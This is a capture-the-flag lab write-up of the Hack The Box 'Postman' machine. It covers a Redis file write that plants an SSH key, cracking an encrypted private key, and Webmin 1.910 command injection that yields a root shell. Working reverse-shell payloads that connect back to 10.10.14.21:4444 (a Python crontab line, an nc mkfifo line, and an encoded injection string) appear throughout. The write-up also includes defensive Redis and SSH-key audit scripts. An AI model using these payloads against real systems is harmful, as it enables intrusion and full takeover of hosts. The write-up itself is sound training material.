Postman

From Luniwiki


Postman01.png

Ports scan

u505@kali:~/HTB/Machines/Postman$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.160
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-03-15 12:29:55 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 10000/udp on 10.10.10.160
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 08:30 EDT
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.86s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV -p 6379 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 08:36 EDT
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

Port 80

Postman02.png

u505@kali:~/HTB/Machines/Postman$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt" -f -t 50 -u http://10.10.10.160

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-15_08-41-45.log
Target: http://10.10.10.160
[08:41:45] Starting:
[08:41:49] 403 - 292B - /.html
[08:42:00] 200 - 4KB - /css/
[08:42:06] 200 - 3KB - /fonts/
[08:42:09] 403 - 293B - /icons/
[08:42:09] 200 - 2KB - /images/
[08:42:09] 200 - 4KB - /index.html
[08:42:10] 200 - 3KB - /js/
[08:42:23] 403 - 301B - /server-status/
[08:42:29] 200 - 8KB - /upload/
Task Completed

Nothing interesting here.

Port 10000

u505@kali:~/HTB/Machines/Postman$ searchsploit webmin 1.910
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)             | exploits/linux/remote/46984.rb
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There is an exploit for this version of Webmin, but it needs an authenticated user.

Port 6379

There are several vectors to abuse Redis (see https://book.hacktricks.xyz/pentesting/6379-pentesting-redis):

  • Get Webshell
  • Get Reverse Shell—Crontab
  • Get SSH–Crackit

Get Webshell

This vector consists of writing a (PHP) file into the web server's document root. It doesn't work here, because the redis user has no write permission on the folder /var/www/html.

u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/www/html
OK
10.10.10.160:6379> config set dbfilename redis.php
OK
10.10.10.160:6379> set test "<?php phpinfo(); ?>"
OK
10.10.10.160:6379> save
(error) ERR
10.10.10.160:6379> config set dir /var/lib/redis
OK

Get Reverse Shell—Crontab

This vector tries to write a crontab file that opens a reverse shell.

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
u505@kali:~/HTB/Machines/Postman$ echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.21\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.10.10.160 -x set 1
OK
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/spool/cron/crontabs/
(error) ERR Changing directory: Permission denied
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"

As expected from the previous attempt, this method doesn't work either, because the redis user cannot write to the folder /var/spool/cron/crontabs.

Get SSH–Crackit

This method tries to push an SSH public key to the server and gain access over SSH.

u505@kali:~/HTB/Machines/Postman$ ssh-keygen -t rsa -f postman
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in postman
Your public key has been saved in postman.pub
The key fingerprint is:
SHA256:5WoRiY1eB6AMHnB9KFCikDDvs3un3EcIIxAzzMmJyHs u505@kali
The key's randomart image is:
+---[RSA 3072]----+
|^*B. ....        |
|B/.+o..+ o       |
|..+.o.o = o      |
| o.Eo. . =       |
|  +. o..S .      |
|   o  . .o       |
|  .    .o        |
|   o.....        |
|  ..oo..         |
+----[SHA256]-----+
u505@kali:~/HTB/Machines/Postman$ (echo -e "\n\n"; cat postman.pub; echo -e "\n\n") > public.txt
u505@kali:~/HTB/Machines/Postman$ cat public.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> get crackit
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDhFUvl8fSLbgMtIXver1r5WscFfmthAs/CEknwXyjsOzdt5k9THjGB8OOfN1OlMzrtnh/nCCt9VyUbPNJcC6Xq6Gr9sO9r5TDFK3G/q1lWJcQB/nUvOW281A13NU0NF+lX+X/gI+SxMLmkEU29e0H3IZLfsAvodvVLJIDwPUBWPVqYG7ugEOG/NkrTOnSaXyjdcf+N/isJjBcXroC5mveo4k5hpE3kN6CUy65zjxgyNlHxgs+XStt5Pm7RyNndVNu8ZYprZ5OqfzUCms5JtEtR/pX66l41PG4Ex5YyzTO/9Gp9XDPFffe590RcTqPiwwHM3lmFgNsC6OOhO2JgJF7c8dsNe9L5Oa2572eZgAx/pQgakoTTPuzHK6BkKM2A7fv2vwk4CFZLNQAlVQ7gq0JGWXjfqA6IKFwLaak+WhNlJmsdrziaRAjaDELPnh9BNax1uTum3toIG9J2wpqdBwNAsNxEQF/dggoSAKsHfKGu8Tys1RNnJGPyKsdYF8uSh68= u505@kali\n\n\n\n"
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> config get dbfilename
1) "dbfilename"
2) "authorized_key"
10.10.10.160:6379> save
OK

If the file has been written correctly, we should be able to log in over SSH.

u505@kali:~/HTB/Machines/Postman$ ssh -i postman redis@10.10.10.160
Enter passphrase for key 'postman':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
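All three Redis vectors above rely on the same thing: an unauthenticated client reachable over the network that can run CONFIG SET dir/dbfilename followed by SAVE. As a defender-side counterpart, here is an added example (not part of the original writeup) that lints a redis.conf for exactly those conditions; both sample configurations are constructed, and the script only parses text.

```python
"""Lint a redis.conf for the conditions the Postman file write relied on.
Added example; it parses text only and never connects to a server."""

# Constructed sample mirroring the box: remote, unauthenticated, CONFIG usable.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

# Constructed hardened sample: local only, password set, CONFIG and SAVE disabled.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass <long-random-secret>
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}

def parse_conf(text):
    """Map each directive (lower-cased) to the list of its argument strings."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, args = line.partition(" ")
        conf.setdefault(key.lower(), []).append(args.strip())
    return conf

def audit(text):
    """Return the findings that make CONFIG SET dir/dbfilename + SAVE abusable."""
    conf = parse_conf(text)
    findings = []
    # Redis listens on every interface when 'bind' is absent or names a wildcard.
    bind_tokens = {t.lstrip("-") for a in conf.get("bind", []) for t in a.split()}
    if not bind_tokens or bind_tokens & WILDCARD_BINDS:
        findings.append("bind: reachable on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode disabled")
    if "requirepass" not in conf and "user" not in conf:  # 'user' = ACL rules (Redis 6+)
        findings.append("no authentication configured")
    renamed = {a.split()[0].upper() for a in conf.get("rename-command", []) if a}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed or disabled: dir/dbfilename changeable at runtime")
    return findings
```

Running audit(WEAK_CONF) reports all four findings, while the hardened sample reports none; an empty bind line is treated as listening everywhere, which is Redis' default.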

Lateral movement

The kernel is recent, and the redis user cannot run sudo commands without a password.

redis@Postman:~$ uname -a
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
redis@Postman:~$ sudo -l
[sudo] password for redis:
sddsa
Sorry, try again.
[sudo] password for redis:
sdasd
Sorry, try again.
[sudo] password for redis:
sudo: 3 incorrect password attempts

bash_history

redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak
ls -la
exit
cat id_rsa.bak
exit
ls -la
crontab -l
systemctl enable redis-server
redis-server
ifconfig
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
exit
crontab -l
cd ~/
ls
nano 6379
exit
whoami

Upload pspy64 and LinEnum.sh

u505@kali:~/HTB/Machines/Postman$ cd utils/
u505@kali:~/HTB/Machines/Postman/utils$ scp -i ../postman pspy64 LinEnum.sh redis@10.10.10.160:/tmp/
Enter passphrase for key '../postman':
pspy64                                                                                    100% 3006KB   4.3MB/s   00:00
LinEnum.sh                                                                                100%   46KB   1.1MB/s   00:00

The tool pspy64 doesn't show any scheduled jobs.

redis@Postman:/tmp$ chmod +x pspy64 LinEnum.sh
redis@Postman:/tmp$ ./LinEnum.sh
...
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25  2019 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25  2019 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26  2019 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25  2019 /var/backups/passwd.bak

LinEnum finds the id_rsa.bak file mentioned in the bash_history.

Private key

u505@kali:~/HTB/Machines/Postman$ scp -i postman redis@postman:/opt/id_rsa.bak matt
The authenticity of host 'postman (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'postman' (ECDSA) to the list of known hosts.
Enter passphrase for key 'postman':
id_rsa.bak                                                                                100% 1743    42.2KB/s   00:00

The private key is encrypted.

u505@kali:~/HTB/Machines/Postman$ head -n 7 matt
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6

We brute-force the key passphrase with john.

u505@kali:~/HTB/Machines/Postman$ /usr/share/john/ssh2john.py matt > matt.hash
u505@kali:~/HTB/Machines/Postman$ john matt.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2020-03-15 10:22) 0.1845g/s 2646Kp/s 2646Kc/s 2646KC/s *7¡Vamos!
Session completed
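The key fell in five seconds because of its format, not the wordlist: a legacy PEM key (BEGIN RSA PRIVATE KEY with a DEK-Info header, as in the head output above) derives its cipher key from the passphrase with one or two MD5 digests (OpenSSL's EVP_BytesToKey), while the openssh-key-v1 format uses bcrypt with a configurable round count. The following added example (not from the writeup) classifies a key file and flags the cheap-to-crack cases; the legacy sample reuses the two header lines shown above with a placeholder body, and make_openssh_key builds a constructed openssh-key-v1 header without real key material.

```python
"""Report how an SSH private key file is protected.  Added example, not from the
writeup.  Legacy PEM keys derive the cipher key with one or two MD5 digests of
passphrase and IV (OpenSSL EVP_BytesToKey), so john can test millions of
candidates per second; openssh-key-v1 keys use bcrypt with a round count."""
import base64
import re
import struct

# Constructed legacy sample: header lines as shown in the writeup, placeholder body.
LEGACY_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

PLACEHOLDERBASE64BODY==
-----END RSA PRIVATE KEY-----
"""
MAGIC = b"openssh-key-v1\x00"

def _ssh_string(b):
    return struct.pack(">I", len(b)) + b

def make_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=100):
    """Constructed openssh-key-v1 header (no key material), used as test data."""
    opts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(opts)
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"

def _read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify(pem):
    """Return (format, cipher, kdf, rounds, weak); weak means cheap to brute-force."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        b64 = "".join(ln for ln in pem.splitlines() if not ln.startswith("-----"))
        blob = base64.b64decode(b64)
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        opts, off = _read_string(blob, off)
        rounds = struct.unpack(">I", opts[-4:])[0] if kdf == b"bcrypt" else 0
        # ssh-keygen's default is -a 16; fewer rounds, or no KDF at all, is weak.
        return ("openssh-key-v1", cipher.decode(), kdf.decode(), rounds, kdf != b"bcrypt" or rounds < 16)
    m = re.search(r"^DEK-Info:\s*([^,\s]+)", pem, re.M)
    if m:  # legacy PEM: MD5-based EVP_BytesToKey, effectively a one-iteration KDF
        return ("legacy-pem", m.group(1), "md5-evp-bytestokey", 1, True)
    return ("unencrypted", None, None, 0, True)
```

A key flagged as legacy-pem can be re-encrypted in place with ssh-keygen -p -o -a 100 -f <key>, which switches it to the openssh-key-v1 format with 100 bcrypt rounds.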

We SSH in as the user matt.

u505@kali:~/HTB/Machines/Postman$ chmod 600 matt
u505@kali:~/HTB/Machines/Postman$ ssh -i matt matt@postman
Enter passphrase for key 'matt':
Connection closed by 10.10.10.160 port 22

But the server closes our session :( If we check sshd_config, we find that the user Matt has been denied SSH access.

redis@Postman:/tmp$ tail -n 20 /etc/ssh/sshd_config
#VersionAddendum none

#deny users
DenyUsers Matt
# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

User flag

SSH is not available, but we try to su to the user Matt with the same password as the private key.

redis@Postman:/tmp$ su Matt
Password:
Matt@Postman:/tmp$ whoami
Matt
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt
<USER_FLAG>

Escalation of privileges

Reusing Matt's credentials, we log into Webmin.

Postman03.png

There is a Metasploit module that gains a shell through the vulnerability found earlier, but it can also be done manually. Following the paper Webmin 1.910 - Remote Code Execution using BurpSuite, we can run commands through the update.cgi script.

Prepare the payload

The netcat on the server doesn't support the -e switch, so we need the mkfifo-based alternative for nc.

u505@kali:~/HTB/Machines/Postman$ echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f" > payload.1
u505@kali:~/HTB/Machines/Postman$ cat payload.1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f

We base64-encode these commands.

u505@kali:~/HTB/Machines/Postman$ cat payload.1 | base64 -w 0 > payload.b64
u505@kali:~/HTB/Machines/Postman$ cat payload.b64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuMjEgNDQ0NCA+L3RtcC9m

The payload is wrapped in a command that base64-decodes it and pipes it to bash.

u505@kali:~/HTB/Machines/Postman$ echo " | bash -c \"{echo,`cat payload.pl.b64`}|{base64,-d}|{bash,-i}\"" > payload.raw
u505@kali:~/HTB/Machines/Postman$ cat payload.raw
 | bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Oyc=}|{base64,-d}|{bash,-i}"

The payload is URL encoded.

u505@kali:~/HTB/Machines/Postman$ . /opt/utils/urlencode/gistfile1.sh
u505@kali:~/HTB/Machines/Postman$ urlencode "`cat payload.raw`" > payload.url
u505@kali:~/HTB/Machines/Postman$ cat payload.url
%20%7C%20bash%20%2Dc%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0%2BZmRvcGVuKCRjLHcpO3doaWxlKDw%2BKXtpZigkXz1%2BIC8oLiopLyl7c3lzdGVtICQxO319Oyc%3D%7D%7C%7Bbase64%2C%2Dd%7D%7C%7Bbash%2C%2Di%7D%22

Open the listener

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Update a package and tamper with the request

We browse to the Software Package Updates screen and intercept the request with Burp.

Postman04.png

We intercept the update.cgi request.

Postman05.png

We modify the content to u=acl%2Fapt&u= followed by our payload.

Postman06.png

The root reverse shell is opened.

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.160.
Ncat: Connection from 10.10.10.160:41798.
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# stty raw -echo
stty raw -echo

Postman07.png

Root flag

root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt
<ROOT_FLAG>


Daniel Simao 13:10, 15 March 2020 (EDT)